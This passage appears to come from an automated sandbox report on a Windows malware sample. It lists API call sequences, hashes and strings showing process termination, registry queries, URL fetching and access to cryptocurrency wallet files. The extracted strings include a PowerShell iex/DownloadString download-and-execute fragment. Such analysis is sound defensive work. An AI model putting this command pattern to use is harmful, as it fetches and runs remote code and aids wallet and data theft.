                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: 290d968b46ccb8bf595a6338e3dcd813e1a98d551ca80cb615ad4e5f9cc2330a
                                    • Instruction ID: 2e89528bea993aaf85a614eaa54ee453f891b2d88424f15414b4c532f158e7bf
                                    • Opcode Fuzzy Hash: 290d968b46ccb8bf595a6338e3dcd813e1a98d551ca80cb615ad4e5f9cc2330a
                                    • Instruction Fuzzy Hash: E251A7B1944308ABEB20EB60DC4AFDA7778AF44700F044598F60DAB2C1EB75AB84DF55
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00CFFA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00CFFA27
                                    • _ValidateLocalCookies.LIBCMT ref: 00CFFAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00CFFADB
                                    • _ValidateLocalCookies.LIBCMT ref: 00CFFB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: b4f1169887d70d7ad67b310bdaeeea29dbada9310d3406890c396f052dd0536a
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: 3D41A63190011DEBCF50DF68C884BADBBB5FF45314F148169EA1CAB392D7319A06DBA2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C8501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C85021
                                    • InternetOpenA.WININET(00CA0DE3,00000000,00000000,00000000,00000000), ref: 00C8503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C85061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C85091
                                    • InternetCloseHandle.WININET(?), ref: 00C85109
                                    • InternetCloseHandle.WININET(?), ref: 00C85116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: d61b4f0179fabe602ee5fb0f56898dbdc83efa349c4263e6e90409b2ab2b268f
                                    • Instruction ID: e7b82cf0b1d5d786b1e47d262f08220fd4556f8166fbf959da499da30ffae876
                                    • Opcode Fuzzy Hash: d61b4f0179fabe602ee5fb0f56898dbdc83efa349c4263e6e90409b2ab2b268f
                                    • Instruction Fuzzy Hash: 52311AB4A0421CABDB20DF54DC85BDDB7B4AB48305F1081D8F709A7280CBB06EC59F98
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C985B6
                                    • wsprintfA.USER32 ref: 00C985E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C9860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C9861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C98629
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,0152DCB0,00000000,000F003F,?,00000400), ref: 00C9867C
                                    • lstrlen.KERNEL32(?), ref: 00C98691
                                    • RegQueryValueExA.ADVAPI32(00000000,0152DC20,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00CA0B3C), ref: 00C98729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C98798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C987AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: a5ce422c084053a119ca3730587760caffc603a1a106a54bea21dcc9b20b48cc
                                    • Instruction ID: b726afb7407c9b0cf5345d9e95c65b6cc125be6faf8b6e2f2eea53c926e67912
                                    • Opcode Fuzzy Hash: a5ce422c084053a119ca3730587760caffc603a1a106a54bea21dcc9b20b48cc
                                    • Instruction Fuzzy Hash: E521E471A1421CABDB24DB54DC89FE9B3B8FB48705F1081D8B609A6180DF71AA85DFE4
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C999C5
                                    • Process32First.KERNEL32(00C8A056,00000128), ref: 00C999D9
                                    • Process32Next.KERNEL32(00C8A056,00000128), ref: 00C999F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C99A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C99A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 00C99A79
                                    • CloseHandle.KERNEL32(00C8A056), ref: 00C99A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: cbd953f318218af1c2f9aebc2040ce98f58aa1ddefe7ce8f80a6e472cae55aa4
                                    • Instruction ID: 4e7ce8247ba4a6ab1471c9513d767600e1f9097c2cf02e43241c4adf9fb65450
                                    • Opcode Fuzzy Hash: cbd953f318218af1c2f9aebc2040ce98f58aa1ddefe7ce8f80a6e472cae55aa4
                                    • Instruction Fuzzy Hash: DA21E971904318ABDF25EFA5DC89BDDB7B9FB48301F1041C8E609A6290DB749B84DF50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C9783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,0151B930,00000000,00020119,00000000), ref: 00C9786D
                                    • RegQueryValueExA.ADVAPI32(00000000,0152DD28,00000000,00000000,?,000000FF), ref: 00C9788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C97898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: e026329a8958bdb15e814ce839d6e6f6d1811501d37d7ee3c5cc28d0cf4f99d2
                                    • Instruction ID: dc05fa2f67a9ba03ffdabdccabddb1042dceb1ae010f8ea596046e1f6edd78ae
                                    • Opcode Fuzzy Hash: e026329a8958bdb15e814ce839d6e6f6d1811501d37d7ee3c5cc28d0cf4f99d2
                                    • Instruction Fuzzy Hash: DC014F75A09309BBEB00EBE4ED4EF6E7778EB48701F104194FB15E7280EA709A00EB54
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C978C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C978CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,0151B930,00000000,00020119,00C97849), ref: 00C978EB
                                    • RegQueryValueExA.ADVAPI32(00C97849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C9790A
                                    • RegCloseKey.ADVAPI32(00C97849), ref: 00C97914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 7b694c5c2ed4d3350def1d89f83a9ee86c37d6ab9f85f0248efea858a3210988
                                    • Instruction ID: 3f263af1912634ae4c3ac0053dd60ae559dd8c4161ad52b725d9766fa9070295
                                    • Opcode Fuzzy Hash: 7b694c5c2ed4d3350def1d89f83a9ee86c37d6ab9f85f0248efea858a3210988
                                    • Instruction Fuzzy Hash: 0501FFB5A44309BBEB00EBE4EC4AFAEB778EB44701F104595F715A7281DB706A00EB90
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                    • LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: d93e754244591d0f70f5c6b63233bd51b3da1146b4d25684562fa56dff12c7a1
                                    • Instruction ID: 5c244a2cc4708872ddb4a4d89550982b8c9526bcec7cf45ae012e95193942f03
                                    • Opcode Fuzzy Hash: d93e754244591d0f70f5c6b63233bd51b3da1146b4d25684562fa56dff12c7a1
                                    • Instruction Fuzzy Hash: FD315C74A00308EFDB10EFA0D889BEE7BB5FF48305F108159E911A7290D774AA80CFA5
                                    APIs
                                    • lstrcat.KERNEL32(?,0152DE78), ref: 00C94A2B
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C94A51
                                    • lstrcat.KERNEL32(?,?), ref: 00C94A70
                                    • lstrcat.KERNEL32(?,?), ref: 00C94A84
                                    • lstrcat.KERNEL32(?,0151B108), ref: 00C94A97
                                    • lstrcat.KERNEL32(?,?), ref: 00C94AAB
                                    • lstrcat.KERNEL32(?,0152D338), ref: 00C94ABF
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C98F20: GetFileAttributesA.KERNEL32(00000000,?,00C81B94,?,?,00CA577C,?,?,00CA0E22), ref: 00C98F2F
                                      • Part of subcall function 00C947C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C947D0
                                      • Part of subcall function 00C947C0: RtlAllocateHeap.NTDLL(00000000), ref: 00C947D7
                                      • Part of subcall function 00C947C0: wsprintfA.USER32 ref: 00C947F6
                                      • Part of subcall function 00C947C0: FindFirstFileA.KERNEL32(?,?), ref: 00C9480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: f6f3ea503350cd24b1d7190b59d5c7c420e3faa3ea313e70c251fea9416cea91
                                    • Instruction ID: 916b5e4c4e2788f76cb0a672d8d9f766cc869a05559dc362b72ff796085ecae4
                                    • Opcode Fuzzy Hash: f6f3ea503350cd24b1d7190b59d5c7c420e3faa3ea313e70c251fea9416cea91
                                    • Instruction Fuzzy Hash: 1C316AB290030CABCF14FBA0DC8AEED733CAB59701F444589B31596091EE70A78D9F94
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C92FD5
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C92F14
                                    • <, xrefs: 00C92F89
                                    • ')", xrefs: 00C92F03
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C92F54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 9449cc314bd6fd24e54e9aa5df6cc1def7c074890212f8bcb3b03a6842b61f69
                                    • Instruction ID: fbf3c4a3ddef678d90cb8d3ae1624afbf53d331784e24df5bed36d3b36f1dbe2
                                    • Opcode Fuzzy Hash: 9449cc314bd6fd24e54e9aa5df6cc1def7c074890212f8bcb3b03a6842b61f69
